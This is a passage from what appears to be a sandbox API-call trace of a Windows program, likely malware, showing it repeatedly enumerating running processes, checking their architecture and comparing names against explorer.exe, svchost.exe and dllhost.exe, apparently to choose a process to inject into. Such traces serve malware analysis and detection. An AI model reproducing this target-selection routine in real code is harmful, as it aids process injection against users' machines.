th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0233.592] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0233.592] CloseHandle (hObject=0xd8) returned 1 [0233.592] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.593] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0233.593] CloseHandle (hObject=0xd4) returned 1 [0233.593] Sleep (dwMilliseconds=0x3e8) [0234.602] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0234.604] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0234.604] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0234.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0234.605] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0234.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0234.605] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0234.606] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0234.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0234.606] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0234.607] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0234.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0234.607] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0234.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0234.608] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0234.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0234.608] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0234.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0234.609] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0234.609] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0234.610] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0234.610] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0234.611] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0234.611] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0234.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0234.612] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0234.612] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0234.613] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0234.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0234.613] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.613] CloseHandle (hObject=0xd8) returned 1 [0234.613] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0234.613] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0234.613] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0234.613] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0234.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0234.614] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0234.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0234.614] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.614] CloseHandle (hObject=0xd8) returned 1 [0234.615] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0234.615] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0234.615] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0234.615] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0234.615] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0234.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0234.616] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0234.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0234.616] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.616] CloseHandle (hObject=0xd8) returned 1 [0234.616] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0234.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0234.617] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.617] CloseHandle (hObject=0xd8) returned 1 [0234.617] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0234.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0234.618] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.618] CloseHandle (hObject=0xd8) returned 1 [0234.618] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0234.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0234.618] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.618] CloseHandle (hObject=0xd8) returned 1 [0234.619] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0234.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0234.619] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.619] CloseHandle (hObject=0xd8) returned 1 [0234.619] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0234.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0234.620] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.620] CloseHandle (hObject=0xd8) returned 1 [0234.620] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0234.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0234.620] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.620] CloseHandle (hObject=0xd8) returned 1 [0234.620] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0234.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0234.621] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.621] CloseHandle (hObject=0xd8) returned 1 [0234.621] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0234.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0234.621] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.621] CloseHandle (hObject=0xd8) returned 1 [0234.621] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0234.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0234.622] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.622] CloseHandle (hObject=0xd8) returned 1 [0234.622] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0234.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0234.623] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.623] CloseHandle (hObject=0xd8) returned 1 [0234.623] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0234.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0234.623] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.623] CloseHandle (hObject=0xd8) returned 1 [0234.623] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0234.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0234.624] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.624] CloseHandle (hObject=0xd8) returned 1 [0234.624] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0234.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0234.624] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.624] CloseHandle (hObject=0xd8) returned 1 [0234.624] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0234.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0234.625] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.625] CloseHandle (hObject=0xd8) returned 1 [0234.625] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0234.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0234.626] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.626] CloseHandle (hObject=0xd8) returned 1 [0234.626] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0234.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0234.626] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.626] CloseHandle (hObject=0xd8) returned 1 [0234.626] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0234.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0234.627] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.627] CloseHandle (hObject=0xd8) returned 1 [0234.627] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0234.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0234.627] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.627] CloseHandle (hObject=0xd8) returned 1 [0234.627] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0234.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0234.628] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.628] CloseHandle (hObject=0xd8) returned 1 [0234.628] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0234.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0234.628] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.628] CloseHandle (hObject=0xd8) returned 1 [0234.629] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0234.629] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0234.630] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0234.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0234.630] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0234.631] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0234.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0234.631] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0234.631] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.632] CloseHandle (hObject=0xd8) returned 1 [0234.632] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0234.632] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, 